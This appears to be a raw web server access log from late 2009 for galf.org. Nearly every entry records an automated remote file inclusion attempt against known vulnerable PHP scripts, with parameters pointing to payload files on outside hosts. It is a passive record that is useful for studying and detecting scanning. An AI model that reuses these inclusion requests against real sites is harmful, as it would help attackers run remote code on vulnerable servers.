211.40.68.132 - - [01/Nov/2009:23:41:50 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:23:41:50 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:23:41:50 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:53 -0800] "GET /logs/access_090713.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:41:55 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.44.162 - - [01/Nov/2009:23:41:55 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.44.162 - - [01/Nov/2009:23:41:55 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:13 -0800] "GET /logs/access_090928.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.191 - - [01/Nov/2009:23:42:16 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:21 -0800] "GET /logs/access_090727.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:22 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:23 -0800] "GET /logs/access_090330.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:23 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:23 -0800] "GET /logs/access_090316.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:27 -0800] "GET /logs/access_090330.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:35 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:35 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:36 -0800] "GET /logs/access_090504.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:39 -0800] "GET /logs/access_090406.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:42:41 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:23:42:41 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:23:42:41 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:23:42:51 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:53 -0800] "GET /logs/access_090518.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:42:57 -0800] "GET /logs/access_090525.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:06 -0800] "GET /logs/access_090316.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:16 -0800] "GET /logs/access_090511.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:17 -0800] "GET /logs/access_090713.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:19 -0800] "GET /logs/access_090928.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:29 -0800] "GET /logs/access_090831.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:30 -0800] "GET /logs/access_090622.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:32 -0800] "GET /logs/access_090824.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:33 -0800] "GET /logs/access_090406.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:35 -0800] "GET /logs/access_090921.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:38 -0800] "GET /logs/access_090330.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:40 -0800] "GET /logs/access_090727.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:40 -0800] "GET /logs/access_090323.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:43 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:44 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:45 -0800] "GET /logs/access.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:49 -0800] "GET /logs/access_090420.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:51 -0800] "GET /logs/access_090629.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:51 -0800] "GET /logs/access_090525.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:57 -0800] "GET /logs/access_090316.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:58 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:43:59 -0800] "GET /logs/access_090713.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:11 -0800] "GET /logs/access_090511.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:16 -0800] "GET /logs/access_090921.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:18 -0800] "GET /logs/access_090629.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:23 -0800] "GET /logs/access_090622.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:29 -0800] "GET /logs/access_090824.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:31 -0800] "GET /logs/access_090921.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:35 -0800] "GET /logs/access_090928.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:44:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:41 -0800] "GET /logs/access_090323.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:43 -0800] "GET /logs/access_090928.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:53 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:54 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:54 -0800] "GET /logs/access.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:44:59 -0800] "GET /logs/access_090420.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:00 -0800] "GET /logs/access_090629.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:02 -0800] "GET /logs/access_090406.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:05 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:05 -0800] "GET /logs/access_090316.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:05 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:19 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:19 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:19 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:22 -0800] "GET /logs/access_090330.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:23 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:24 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [01/Nov/2009:23:45:27 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:28 -0800] "GET /logs/access_090525.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:34 -0800] "GET /logs/access_090316.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:23:45:51 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:45:57 -0800] "GET /logs/access_090511.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:45:59 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:45:59 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:45:59 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:46:08 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:11 -0800] "GET /logs/access_090622.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:12 -0800] "GET /logs/access_090824.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:46:15 -0800] "GET /logs/access_090817.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:23:46:16 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.briel.ro/saga/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:17 -0800] "GET /logs/access_090921.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:21 -0800] "GET /logs/access_090323.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:23 -0800] "GET /logs/access_090831.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:25 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:26 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:27 -0800] "GET /logs/access.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:30 -0800] "GET /logs/access_090420.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:33 -0800] "GET /logs/access_090629.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:53 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:46:54 -0800] "GET /logs/access_090713.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:47:01 -0800] "GET /logs/access_090921.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:47:05 -0800] "GET /logs/access_090629.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:47:19 -0800] "GET /logs/access_090928.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:48:45 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:48:45 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:48:45 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:48:50 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.6.163.20 - - [01/Nov/2009:23:48:52 -0800] "GET /logs/access.log HTTP/1.0" 200 247270 "-" "Mozilla/8.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:23:48:56 -0800] "GET /logs/access_090817.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:50:02 -0800] "GET /logs/access_090504.log//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:23:50:07 -0800] "GET /logs/access.log HTTP/1.1" 200 248073 "-" "Mozilla/8.0" "www.galf.org"
64.150.183.219 - - [01/Nov/2009:23:50:08 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fishing4u.co.uk./forum/customavatars/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [01/Nov/2009:23:50:08 -0800] "GET /logs/access_090504.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fishing4u.co.uk./forum/customavatars/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:50:09 -0800] "GET /logs/access.log//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:50:10 -0800] "GET /logs/access_090713.log//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [01/Nov/2009:23:50:13 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fishing4u.co.uk./forum/customavatars/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
